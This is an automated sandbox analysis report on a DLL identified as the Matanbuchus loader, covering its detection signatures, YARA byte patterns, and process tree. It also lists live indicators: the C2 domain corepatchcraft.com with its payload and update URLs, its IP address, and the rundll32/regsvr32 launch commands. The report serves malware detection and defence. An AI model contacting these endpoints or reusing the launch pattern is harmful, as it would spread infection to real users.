Windows Analysis Report
file.dll

Overview

General Information

Sample name: file.dll
Analysis ID: 1592430
MD5: 04089eb8f941dee4f0fbbfec314718d8
SHA1: ce07c536f70af194a363f2c1a81d99680562c4a2
SHA256: 96678cacc0550c86d40b54672c15d1d3e35743fddf3c2235c21ff636d4a8961d
Tags: dll, init-module, Matanbuchus, user-Bitsight

Detection

Matanbuchus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4052 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2528 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2800 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6932 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1804 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,Export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5696 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7036 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7044 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4900 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2912 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4600 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4328 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4032 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDll MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 1912 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 6744 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 5036 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 4980 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 6984 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 5688 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Matanbuchus | According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections. Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus
No configs have been found
Source | Rule | Description | Author | Strings
file.dll | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\8f08\user-PC\user-PC.winmd | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security

Source | Rule | Description | Author | Strings
00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security
00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_4ce9affb | unknown | unknown
  • 0x210e5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
  • 0x23715:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_58a61aaa | unknown | unknown
  • 0x33490:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security
0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Matanbuchus_4ce9affb | unknown | unknown
  • 0x210e5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
  • 0x23715:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B

Source | Rule | Description | Author | Strings
29.2.regsvr32.exe.6c3f0000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security
9.2.regsvr32.exe.6c3d0000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security
3.2.rundll32.exe.6cc50000.1.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security
5.2.rundll32.exe.6cc50000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security
11.2.rundll32.exe.6cc50000.0.unpack | JoeSecurity_Matanbuchus | Yara detected Matanbuchus | Joe Security

System Summary

Source: Network Connection | Author: Dmitriy Lifanov, oscd.community | Data: DestinationIp: 94.159.113.213, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 6744, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-16T06:02:04.291204+0100 | 2034468 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 94.159.113.213 | 443 | TCP
2025-01-16T06:02:00.600788+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 94.159.113.213 | 443 | TCP
2025-01-16T06:02:00.664846+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49709 | 94.159.113.213 | 443 | TCP
2025-01-16T06:02:02.561415+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 94.159.113.213 | 443 | TCP
2025-01-16T06:02:03.975767+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49713 | 94.159.113.213 | 443 | TCP
2025-01-16T06:02:08.504894+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49733 | 94.159.113.213 | 443 | TCP
2025-01-16T06:03:03.710922+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 64426 | 94.159.113.213 | 443 | TCP
2025-01-16T06:04:03.721325+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 64474 | 94.159.113.213 | 443 | TCP

AV Detection

Source: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php: | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/XH | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/kernel2.aspx | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/libraries_v2 | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/lowedCert_AutoUpdate_1 | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/ | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/B | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/OeGc | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/ | Avira URL Cloud: Label: malware
Source: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackward | Avira URL Cloud: Label: malware
Source: file.dll | Virustotal: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.dll | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64426 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64474 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_7EF64932 FindFirstFileExW,3_2_7EF64932
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_7FAD4932 FindFirstFileExW,5_2_7FAD4932
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 9_2_7F094932 FindFirstFileExW,9_2_7F094932

Networking

Source: Network traffic | Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.6:49714 -> 94.159.113.213:443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 94.159.113.213 443
Source: global traffic | TCP traffic: 192.168.2.6:60834 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 192.168.2.6:64270 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /kernel2.aspx HTTP/1.1 | Host: corepatchcraft.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /libraries_v2 HTTP/1.1 | Host: corepatchcraft.com | Cache-Control: no-cache
Source: Joe Sandbox View | ASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49709 -> 94.159.113.213:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49710 -> 94.159.113.213:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49712 -> 94.159.113.213:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49713 -> 94.159.113.213:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49733 -> 94.159.113.213:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:64426 -> 94.159.113.213:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:64474 -> 94.159.113.213:443
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_7FAB1890 HttpSendRequestA,InternetReadFile,InternetCloseHandle,std::ios_base::_Ios_base_dtor,std::ios_base::_Ios_base_dtor,5_2_7FAB1890
Source: global traffic | DNS traffic detected: DNS query: corepatchcraft.com
Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /updates/system-components/2025-release/updates_api.php HTTP/1.1 | User-Agent: Microsoft-WNS/10.0 | Content-Type: application/x-www-form-urlencoded | Accept-Language: fr-CA | Host: corepatchcraft.com | Content-Length: 585 | Cache-Control: no-cache
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/OeGc
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/XH
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/lowedCert_AutoUpdate_1
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackward
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/B
Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php:
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64401 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64454 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64471 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64429 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64460 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64441 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64311 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64466 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64350 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64418 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60864 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64435 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64401
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64423 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64382
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60854 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60919 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64340 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64417 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64455 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64390
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64390 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60905
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64461 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64440 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64450 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64467 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64279
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64434 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60911
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64290
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64445 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64428 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64456 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64473 -> 443
                    Source: unknown, HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49709 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49733 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64426 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64474 version: TLS 1.2

                    System Summary

                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 7FABE000 appears 46 times
                    Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 7EF4E000 appears 45 times
                    Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 7EF5BFCD appears 167 times
                    Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 7FACBFCD appears 167 times
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: String function: 7F08BFCD appears 152 times
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: String function: 7F07E000 appears 41 times
                    Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                    Source: file.dll, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
